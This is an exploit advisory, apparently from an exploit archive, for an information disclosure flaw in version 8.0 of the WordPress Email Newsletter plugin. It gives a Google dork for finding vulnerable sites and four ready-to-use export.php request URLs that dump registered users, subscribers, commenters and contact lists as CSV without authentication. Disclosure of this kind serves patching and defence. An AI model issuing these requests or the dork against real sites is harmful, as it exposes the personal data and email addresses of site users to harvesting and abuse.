WordPress Email Newsletter plugin version 8.0 suffers from multiple information disclosure vulnerabilities.
5af9cbff36f380221e2a6015e1612cfd09e21fd6c1700e807643711213eae0aa
##################################################
# Description : Wordpress Plugins - Email Newsletter Information
Disclosure Vulnerability
# Version : 8.0
# Link : http://wordpress.org/extend/plugins/email-newsletter/
# Plugins : http://downloads.wordpress.org/plugin/email-newsletter.zip
# Date : 28-05-2012
# Google Dork : inurl:/wp-content/plugins/email-newsletter/
# Author : Sammy FORGIT - sam at opensyscom dot fr -
http://www.opensyscom.fr
##################################################
Exploit :
http://www.exemple.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=registered_user
http://www.exemple.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=view_suscriber
http://www.exemple.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=commentposed_user
http://www.exemple.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=contact_user